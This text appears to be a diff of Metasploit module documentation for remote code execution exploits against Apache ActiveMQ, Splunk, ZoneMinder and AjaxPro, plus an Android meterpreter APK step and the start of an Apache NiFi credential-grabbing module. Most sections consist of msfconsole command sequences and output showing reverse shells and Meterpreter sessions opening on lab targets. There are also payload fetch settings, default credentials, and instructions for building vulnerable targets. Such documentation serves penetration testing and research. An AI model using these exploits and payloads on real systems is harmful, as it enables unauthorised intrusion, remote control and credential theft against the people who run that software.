[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.86.43
|
||||
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:44674) at 2023-11-02 10:17:42 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: steve
|
||||
meterpreter > pwd
|
||||
/home/steve/Downloads/apache-activemq-5.18.2/bin
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.86.43
|
||||
OS : Ubuntu 22.04 (Linux 6.2.0-33-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.86.43 - Meterpreter session 3 closed. Reason: Died
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >
|
||||
```
|
||||
|
||||
### Unix
|
||||
|
||||
```
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
|
||||
|
||||
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CHOST no The local client address
|
||||
CPORT no The local client port
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 61616 yes The target port (TCP)
|
||||
SRVHOST 192.168.86.42 yes The local host or network interface to
|
||||
listen on. This must be an address on t
|
||||
he local machine or 0.0.0.0 to listen o
|
||||
n all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSLCert no Path to a custom SSL certificate (defau
|
||||
lt is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (defaul
|
||||
t is random)
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.86.42 yes The listen address (an interface may be s
|
||||
pecified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 Unix
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
|
||||
[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
|
||||
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/3mzi3Tfryin
|
||||
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.43:48962) at 2023-11-02 10:20:13 +0000
|
||||
id
|
||||
[*] 192.168.86.43:61616 - Server stopped.
|
||||
|
||||
uid=1000(steve) gid=1000(steve) groups=1000(steve),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),139(wireshark)
|
||||
pwd
|
||||
/home/steve/Downloads/apache-activemq-5.18.2/bin
|
||||
uname -a
|
||||
Linux sfewer-ubuntu-test 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
```
|
||||
@@ -0,0 +1,109 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
|
||||
The vulnerability affects versions 9.0.x prior to 9.0.7 and 9.1.x before 9.1.2.
|
||||
The exploit takes advantage of a flaw in the XSLT transformation functionality of Splunk Enterprise
|
||||
and requires valid credentials to be executed successfully, with the default credentials often being admin:changeme.
|
||||
|
||||
Upon successful exploitation, the attacker is able to execute code with the same privileges as the Splunk service user.
|
||||
Typically, this user is 'splunk' and the resulting shell will have permissions associated with this user account,
|
||||
which may vary depending on the specific environment and configuration of the Splunk service.
|
||||
|
||||
## Verification Steps
|
||||
1. **Start Metasploit**: Launch `msfconsole` in your Metasploit framework.
|
||||
2. **Select the Module**: Use the module with the command `use exploit/unix/http/splunk_xslt_authenticated_rce`.
|
||||
3. **Disable AutoCheck**: Optionally, you can disable the automatic vulnerability check with `set AutoCheck false`.
|
||||
4. **Execute the Exploit**: Use the `exploit` command to run the exploit.
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > options
|
||||
|
||||
Module options (exploit/unix/http/splunk_xslt_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PASSWORD changeme yes Password for Splunk
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RANDOM_FILENAME gWQgBqnz no Random filename with 8 characters
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
|
||||
loit.html
|
||||
RPORT 8000 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
USERNAME admin yes Username for Splunk
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME eXHMuZOtzdPG no Name to use on remote system when storing payload; cannot contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
|
||||
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set rhosts chocapikk.lab
|
||||
rhosts => chocapikk.lab
|
||||
msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.5:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Successfully authenticated on the Splunk instance
|
||||
[+] The target appears to be vulnerable. Exploitable version found: 9.1.1
|
||||
[+] Successfully authenticated on the Splunk instance
|
||||
[*] Extracting CSRF token from cookies
|
||||
[+] CSRF token successfully extracted: 4066849599386392852
|
||||
[+] Malicious file uploaded successfully
|
||||
[*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
|
||||
[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701424044.745/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701424043.744/gWQgBqnz.xsl
|
||||
[+] XSLT transformation triggered successfully
|
||||
[*] Executing payload at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
|
||||
[+] Payload executed successfully
|
||||
[*] Sending stage (3045380 bytes) to 172.17.0.2
|
||||
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:60690) at 2023-12-01 10:47:25 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Red Hat Enterprise Linux 8 (Linux 6.4.10-060410-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Exploitation Process
|
||||
1. **Authentication**: The module authenticates using provided credentials.
|
||||
2. **CSRF Token Extraction**: Extracts a CSRF token from the Splunk server for subsequent requests.
|
||||
3. **Malicious File Upload**: Uploads a malicious XSL file to the server.
|
||||
4. **Triggering XSLT Transformation**: Initiates an XSLT transformation to execute the payload.
|
||||
5. **Executing Payload**: Executes the payload, resulting in a reverse shell or similar access.
|
||||
|
||||
### Creating a Vulnerable Splunk
|
||||
|
||||
```
|
||||
docker run -p 8000:8000 -e "SPLUNK_PASSWORD=Password^" -e "SPLUNK_START_ARGS=--accept-license" -it splunk/splunk:9.1.1
|
||||
```
|
||||
To create a vulnerable user, login with admin, then browse:
|
||||
settings > users > New User
|
||||
Create a new user with the 'user' and 'splunk-system-role' role
|
||||
|
||||
### Expected Results
|
||||
- This exploit requires valid credentials for successful execution.
|
||||
@@ -0,0 +1,154 @@
|
||||
## Description
|
||||
|
||||
This module exploits a command injection that leads to a remote execution in ZoneMinder surveillance software versions before 1.36.33 and before 1.37.33
|
||||
|
||||
More about the vulnerability detail: [2023-26035](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26035).
|
||||
|
||||
The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
|
||||
|
||||
The module will check if the target is vulnerable, by sending a sleep command.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Zoneminder](https://zoneminder.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
|
||||
|
||||
This module has been tested successfully on Zoneminder versions:
|
||||
|
||||
* 1.36.31~64bit on Debian 11
|
||||
|
||||
### Source and Installers
|
||||
|
||||
* [Source Code Repository](https://github.com/ZoneMinder/zoneminder/tree/1.36.31)
|
||||
* [Installers](https://zoneminder.readthedocs.io/en/stable/installationguide/index.html)
|
||||
|
||||
**The 3rd party debian-repository has packages for the vulnerable versions(for example zoneminder=1.36.31-bullseye1)**
|
||||
|
||||
### Ansible Installation
|
||||
|
||||
This exploit was tested using [a debian bullseye cloudimage](https://cloud.debian.org/images/cloud/bullseye/20210814-734/)
|
||||
with the following ansible-roles:
|
||||
|
||||
```yaml
|
||||
roles:
|
||||
- src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
|
||||
version: v1.2
|
||||
name: zoneminder
|
||||
- src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
|
||||
version: v1.2
|
||||
name: debiansnapshot
|
||||
- src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
|
||||
version: v1.0.0
|
||||
name: mariadb
|
||||
- src: https://github.com/ait-cs-IaaS/ansible-apache2.git
|
||||
version: v1.3
|
||||
name: apache2
|
||||
```
|
||||
|
||||
Zoneminder was deployed using the following playbook:
|
||||
|
||||
```yaml
|
||||
- name: Install old Debian-Archive-Repo Host
|
||||
hosts: all
|
||||
remote_user: debian
|
||||
become: true
|
||||
vars:
|
||||
debsnap_timestamp: 20210815T082041Z
|
||||
debsnap_debrelease: bullseye
|
||||
roles:
|
||||
- role: debiansnapshot
|
||||
|
||||
- name: Install Videoserver Host
|
||||
hosts: all
|
||||
remote_user: debian
|
||||
become: true
|
||||
tasks:
|
||||
- name: Install Videoserver Packages
|
||||
ansible.builtin.apt:
|
||||
pkg:
|
||||
- vim
|
||||
- curl
|
||||
- netcat-traditional
|
||||
update_cache: yes
|
||||
|
||||
roles:
|
||||
- role: mariadb
|
||||
- role: apache2
|
||||
vars:
|
||||
apache2_modules:
|
||||
- name: "headers"
|
||||
- name: "rewrite"
|
||||
- name: "expires"
|
||||
- name: "cgi"
|
||||
apache2_vhosts:
|
||||
- name: default
|
||||
http: true
|
||||
vhost_template: "redir.j2"
|
||||
- role: zoneminder
|
||||
vars:
|
||||
zoneminder_debrelease: bullseye
|
||||
```
|
||||
|
||||
The following template-file("redir.j2") for apache2 redirects requests to the
|
||||
zoneminder subdirectory:
|
||||
|
||||
```
|
||||
<VirtualHost *:80>
|
||||
ServerName {{ item.name }}
|
||||
{% if item.aliases is defined %}
|
||||
ServerAlias {{ item.aliases|join(' ') }}
|
||||
{% endif %}
|
||||
DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
|
||||
RedirectMatch ^/$ /zm/
|
||||
ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
|
||||
CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined
|
||||
|
||||
<Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
|
||||
Options FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Require all granted
|
||||
</Directory>
|
||||
</VirtualHost>
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Do: `use exploit/unix/webapp/zoneminder_snapshots`
|
||||
2. Do: `set RHOSTS [ips]`
|
||||
3. Do: `set LHOST [lhost]`
|
||||
4. Do: `run`
|
||||
5. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
Remote web path to the zoneminder installation (default: /zm/)
|
||||
|
||||
## Scenarios
|
||||
|
||||
In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is
|
||||
192.42.1.188.
|
||||
|
||||
### Zoneminder 1.36.31-bullseye1
|
||||
|
||||
The following demo shows how to use the exploit with minimal settings:
|
||||
|
||||
```
|
||||
msf6 exploit(unix/webapp/zoneminder_snapshots) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.42.1.188:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Elapsed time: 10.249642733018845 seconds.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Fetching CSRF Token
|
||||
[+] Got Token: key:b5da21a154bc5f46cd2b3648fe9e44931dd74bac,1697109606
|
||||
[*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
[*] Sending payload
|
||||
[*] Sending stage (3045380 bytes) to 192.42.0.254
|
||||
[*] Meterpreter session 1 opened (192.42.1.188:4444 -> 192.42.0.254:56398) at 2023-10-12 11:20:07 +0000
|
||||
[+] Payload sent
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,296 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
This module leverages an insecure deserialization of data to get
|
||||
remote code execution on the target OS in the context of the user
|
||||
running the website which utilized AjaxPro.
|
||||
|
||||
To achieve code execution, the module will construct some JSON data
|
||||
which will be sent to the target. This data will be deserialized by
|
||||
the AjaxPro JsonDeserializer and will trigger the execution of the
|
||||
payload.
|
||||
|
||||
All AjaxPro versions prior to 21.10.30.1 are vulnerable to this
|
||||
issue, and a vulnerable method which can be used to trigger the
|
||||
deserialization exists in the default AjaxPro namespace.
|
||||
|
||||
AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom
|
||||
method that accepts a parameter of type that is assignable from
|
||||
`ObjectDataProvider` (e.g. `object`) exists, the vulnerability can
|
||||
still be exploited.
|
||||
|
||||
This module has been tested successfully against official AjaxPro on
|
||||
version 7.7.31.1 without any modification, and on version 21.10.30.1
|
||||
with a custom vulnerable method added.
|
||||
|
||||
### Download
|
||||
|
||||
Ajax.NET Professional (AjaxPro) is a commercial library for ASP.NET
|
||||
which provides AJAX functionality. It is available for download
|
||||
from the official github repository [here](https://github.com/michaelschwarz/Ajax.NET-Professional/)
|
||||
|
||||
### Setup (Versions < 21.10.30.1)
|
||||
|
||||
1. Create a new .Net Framework Web Project.
|
||||
2. Reference a vulnerable version of `AjaxPro.2.dll` in the project.
|
||||
If using v21.10.30.1, please follow the `Additional Steps to Add Custom Vulnerable Method`
|
||||
in the next section as well
|
||||
3. Add following lines to your web.config if you are using Integrated IIS pipeline mode:
|
||||
``` xml
|
||||
<configuration>
|
||||
<location path="ajaxpro">
|
||||
<system.webServer>
|
||||
<handlers>
|
||||
<add name="AjaxPro" verb="GET,POST" path="*.ashx" type="AjaxPro.AjaxHandlerFactory,AjaxPro.2" />
|
||||
</handlers>
|
||||
</system.webServer>
|
||||
</location>
|
||||
</configuration>
|
||||
```
|
||||
4. If you are using Classic IIS pipeline mode, then please add following lines:
|
||||
``` xml
|
||||
<configuration>
|
||||
<location path="ajaxpro">
|
||||
<system.web>
|
||||
<httpHandlers>
|
||||
<add verb="GET,POST" path="*.ashx" type="AjaxPro.AjaxHandlerFactory,AjaxPro.2"/>
|
||||
</httpHandlers>
|
||||
</system.web>
|
||||
</location>
|
||||
</configuration>
|
||||
```
|
||||
|
||||
### Additional Steps to Add Custom Vulnerable Method (Compulsory for v21.10.30.1)
|
||||
|
||||
There are two ways to add a vulnerable method:
|
||||
1. Add a custom method to the web project
|
||||
2. Patch the `AjaxPro.2.dll` with tools like dnSpy or ILSpy to add back the
|
||||
vulnerable method which existed in the default AjaxPro namespace before v21.10.30.1
|
||||
|
||||
After adding a vulnerable method, follow the setup steps in the previous section as normal.
|
||||
|
||||
#### Add a custom method in the Web Project
|
||||
|
||||
Add the a method which accepts a parameter type which is assignable from
|
||||
`ObjectDataProvider`(e.g. `object`) and add `AjaxMethodAttribute` to the
|
||||
method to allow it to be accessed from AjaxPro.
|
||||
|
||||
``` csharp
|
||||
namespace Example
|
||||
{
|
||||
public class ExampleClass
|
||||
{
|
||||
[AjaxMethod]
|
||||
public void ExampleMethod(object vulObj) {}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
##### Options for the module in this example
|
||||
|
||||
`Namespace` should be `Example.ExampleClass,{ProjectName}`
|
||||
|
||||
`Method` should be `ExampleMethod`
|
||||
|
||||
`Parameter` should be `vulObj`
|
||||
|
||||
#### Patch the dll to add back vulnerable method
|
||||
|
||||
Use tools like dnSpy or ILSpy to add the following class to the `AjaxPro.2.dll`.
|
||||
This is the class which is included in versions before 21.10.30.1.
|
||||
|
||||
``` csharp
|
||||
using System;
|
||||
|
||||
namespace AjaxPro.Services
|
||||
{
|
||||
[AjaxNamespace("AjaxPro.Services.Cart")]
|
||||
public abstract class ICartService
|
||||
{
|
||||
[AjaxMethod]
|
||||
public abstract bool AddItem(string cartName, object item);
|
||||
|
||||
[AjaxMethod]
|
||||
public abstract object[] GetItems(string cartName);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
If this class is added back, the patched `AjaxPro.2.dll` should have a consistent
|
||||
behavior with versions before regarding the deserialization RCE issue.
|
||||
|
||||
##### Options for the module in this example
|
||||
|
||||
`Namespace` should be `AjaxPro.Services.ICartService,AjaxPro.2`
|
||||
|
||||
`Method` should be `AddItem`
|
||||
|
||||
`Parameter` should be `item`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Follow the instructions in the previous section to setup a vulnerable version of AjaxPro.
|
||||
2. Open the msfconsole, and do the following steps:
|
||||
```
|
||||
use exploit/windows/http/ajaxpro_deserialization_rce
|
||||
set rhosts <target ip>
|
||||
set rport <target port>
|
||||
set lhost <local ip>
|
||||
set method <vulnerable Ajax method>
|
||||
set parameter <vulnerable Ajax parameter>
|
||||
set namespace <vulnerable Ajax namespace>
|
||||
set SSL <true> if the target port is SSL enabled.
|
||||
set target <target #>
|
||||
exploit
|
||||
```
|
||||
3. You should get session.
|
||||
|
||||
## Targets
|
||||
|
||||
### 0 (Windows Command)
|
||||
|
||||
This executes a Windows command.
|
||||
|
||||
### 1 (Windows Dropper)
|
||||
|
||||
This uses a Windows dropper to execute code.
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
The base path to AjaxPro Handler, which is set to `/ajaxpro/` by default.
|
||||
|
||||
### Namespace
|
||||
|
||||
The namespace of vulnerable method, which is set to `AjaxPro.Services.ICartService,AjaxPro.2`
|
||||
by default.
|
||||
|
||||
> Namespace of the class joint with classname and project name,
|
||||
> which will be passed to `System.Type.GetType(string)`.
|
||||
>
|
||||
> Please make sure you can get the `ExampleClass` when passing this `{Namespace}` to
|
||||
> `System.Type.GetType(string)`.
|
||||
|
||||
> Default value is the namespace in which the default vulnerable method exists in
|
||||
> versions before 21.10.30.1 is defined
|
||||
|
||||
### Method
|
||||
|
||||
The name of vulnerable method, which is set to `AddItem` by default.
|
||||
|
||||
> The method which accepts a parameter type `object` which is
|
||||
> assignable from `ObjectDataProvider`
|
||||
|
||||
> Default value is the name of the default vulnerable method which exists in versions
|
||||
> before 21.10.30.1
|
||||
|
||||
### Parameter
|
||||
|
||||
The name of vulnerable parameter which, is set to `item` by default.
|
||||
|
||||
> The exact parameter name
|
||||
|
||||
> Default value is the name of the parameter of the default vulnerable method
|
||||
> which exists in versions before 21.10.30.1
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Command
|
||||
|
||||
```
|
||||
msf6 > use exploit/windows/http/ajaxpro_deserialization_rce
|
||||
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set rhosts 127.0.0.2
|
||||
rhosts => 127.0.0.2
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set rport 57750
|
||||
rport => 57750
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set lhost 127.0.0.1
|
||||
lhost => 127.0.0.1
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set vhost localhost
|
||||
vhost => localhost
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. And confirmed target method exists.
|
||||
[*] Sending stage (175686 bytes) to 127.0.0.1
|
||||
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:51844) at 2023-10-28 01:27:00 +0800
|
||||
```
|
||||
|
||||
### Windows Dropper
|
||||
|
||||
```
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > use exploit/windows/http/ajaxpro_deserialization_rce
|
||||
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set rhosts 127.0.0.2
|
||||
rhosts => 127.0.0.2
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set rport 57750
|
||||
rport => 57750
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set lhost 127.0.0.1
|
||||
lhost => 127.0.0.1
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set vhost localhost
|
||||
vhost => localhost
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > set cmdstager::flavor certutil
|
||||
cmdstager::flavor => certutil
|
||||
msf6 exploit(windows/http/ajaxpro_deserialization_rce) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. And confirmed target method exists.
|
||||
[*] Command Stager progress - 2.05% done (2046/99626 bytes)
|
||||
[*] Command Stager progress - 4.11% done (4092/99626 bytes)
|
||||
[*] Command Stager progress - 6.16% done (6138/99626 bytes)
|
||||
[*] Command Stager progress - 8.21% done (8184/99626 bytes)
|
||||
[*] Command Stager progress - 10.27% done (10230/99626 bytes)
|
||||
[*] Command Stager progress - 12.32% done (12276/99626 bytes)
|
||||
[*] Command Stager progress - 14.38% done (14322/99626 bytes)
|
||||
[*] Command Stager progress - 16.43% done (16368/99626 bytes)
|
||||
[*] Command Stager progress - 18.48% done (18414/99626 bytes)
|
||||
[*] Command Stager progress - 20.54% done (20460/99626 bytes)
|
||||
[*] Command Stager progress - 22.59% done (22506/99626 bytes)
|
||||
[*] Command Stager progress - 24.64% done (24552/99626 bytes)
|
||||
[*] Command Stager progress - 26.70% done (26598/99626 bytes)
|
||||
[*] Command Stager progress - 28.75% done (28644/99626 bytes)
|
||||
[*] Command Stager progress - 30.81% done (30690/99626 bytes)
|
||||
[*] Command Stager progress - 32.86% done (32736/99626 bytes)
|
||||
[*] Command Stager progress - 34.91% done (34782/99626 bytes)
|
||||
[*] Command Stager progress - 36.97% done (36828/99626 bytes)
|
||||
[*] Command Stager progress - 39.02% done (38874/99626 bytes)
|
||||
[*] Command Stager progress - 41.07% done (40920/99626 bytes)
|
||||
[*] Command Stager progress - 43.13% done (42966/99626 bytes)
|
||||
[*] Command Stager progress - 45.18% done (45012/99626 bytes)
|
||||
[*] Command Stager progress - 47.23% done (47058/99626 bytes)
|
||||
[*] Command Stager progress - 49.29% done (49104/99626 bytes)
|
||||
[*] Command Stager progress - 51.34% done (51150/99626 bytes)
|
||||
[*] Command Stager progress - 53.40% done (53196/99626 bytes)
|
||||
[*] Command Stager progress - 55.45% done (55242/99626 bytes)
|
||||
[*] Command Stager progress - 57.50% done (57288/99626 bytes)
|
||||
[*] Command Stager progress - 59.56% done (59334/99626 bytes)
|
||||
[*] Command Stager progress - 61.61% done (61380/99626 bytes)
|
||||
[*] Command Stager progress - 63.66% done (63426/99626 bytes)
|
||||
[*] Command Stager progress - 65.72% done (65472/99626 bytes)
|
||||
[*] Command Stager progress - 67.77% done (67518/99626 bytes)
|
||||
[*] Command Stager progress - 69.83% done (69564/99626 bytes)
|
||||
[*] Command Stager progress - 71.88% done (71610/99626 bytes)
|
||||
[*] Command Stager progress - 73.93% done (73656/99626 bytes)
|
||||
[*] Command Stager progress - 75.99% done (75702/99626 bytes)
|
||||
[*] Command Stager progress - 78.04% done (77748/99626 bytes)
|
||||
[*] Command Stager progress - 80.09% done (79794/99626 bytes)
|
||||
[*] Command Stager progress - 82.15% done (81840/99626 bytes)
|
||||
[*] Command Stager progress - 84.20% done (83886/99626 bytes)
|
||||
[*] Command Stager progress - 86.25% done (85932/99626 bytes)
|
||||
[*] Command Stager progress - 88.31% done (87978/99626 bytes)
|
||||
[*] Command Stager progress - 90.36% done (90024/99626 bytes)
|
||||
[*] Command Stager progress - 92.42% done (92070/99626 bytes)
|
||||
[*] Command Stager progress - 94.47% done (94116/99626 bytes)
|
||||
[*] Command Stager progress - 96.52% done (96162/99626 bytes)
|
||||
[*] Command Stager progress - 98.58% done (98208/99626 bytes)
|
||||
[*] Sending stage (175686 bytes) to 127.0.0.1
|
||||
[*] Command Stager progress - 100.00% done (99626/99626 bytes)
|
||||
[*] Meterpreter session 3 opened (127.0.0.1:4444 -> 127.0.0.1:51919) at 2023-10-28 01:34:30 +0800
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
@@ -37,7 +37,7 @@ To create the APK with `msfconsole`:
|
||||
msf > use payload/android/meterpreter/reverse_tcp
|
||||
msf payload(reverse_tcp) > set LHOST 192.168.1.199
|
||||
LHOST => 192.168.1.199
|
||||
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
|
||||
msf payload(reverse_tcp) > generate -f raw -o /tmp/android.apk
|
||||
[*] Writing 8992 bytes to /tmp/android.apk...
|
||||
msf payload(reverse_tcp) >
|
||||
```
|
||||
|
||||
@@ -0,0 +1,486 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module will grab Apache NiFi credentials from various files on Linux.
|
||||
|
||||
It uses the following files:
|
||||
|
||||
1. `authorizers.xml` to pull information about external authorizers such as Azure Active Directory
|
||||
2. `login-identity-providers.xml` to pull any single user credential (password is hashed)
|
||||
3. `nifi.properties` to determine encryption algorithm and key for the last file:
|
||||
4. `flow.json.gz` to pull any flow and server encrypted credentials
|
||||
|
||||
To test this module, you'll need the previous files. NiFi can be installed, and the values all set
|
||||
however the instructions to do such are rather long. Samples of those files can be used and all placed
|
||||
in the `conf` folder:
|
||||
|
||||
### authorizers.xml
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
|
||||
<authorizers>
|
||||
<userGroupProvider>
|
||||
<identifier>file-user-group-provider</identifier>
|
||||
<class>org.apache.nifi.authorization.FileUserGroupProvider</class>
|
||||
<property name="Users File">./conf/users.xml</property>
|
||||
<property name="Legacy Authorized Users File"></property>
|
||||
|
||||
<property name="Initial User Identity 1"></property>
|
||||
</userGroupProvider>
|
||||
|
||||
|
||||
<accessPolicyProvider>
|
||||
<identifier>file-access-policy-provider</identifier>
|
||||
<class>org.apache.nifi.authorization.FileAccessPolicyProvider</class>
|
||||
<property name="User Group Provider">file-user-group-provider</property>
|
||||
<property name="Authorizations File">./conf/authorizations.xml</property>
|
||||
<property name="Initial Admin Identity"></property>
|
||||
<property name="Legacy Authorized Users File"></property>
|
||||
<property name="Node Identity 1"></property>
|
||||
<property name="Node Group"></property>
|
||||
</accessPolicyProvider>
|
||||
|
||||
<authorizer>
|
||||
<identifier>managed-authorizer</identifier>
|
||||
<class>org.apache.nifi.authorization.StandardManagedAuthorizer</class>
|
||||
<property name="Access Policy Provider">file-access-policy-provider</property>
|
||||
</authorizer>
|
||||
|
||||
<authorizer>
|
||||
<identifier>single-user-authorizer</identifier>
|
||||
<class>org.apache.nifi.authorization.single.user.SingleUserAuthorizer</class>
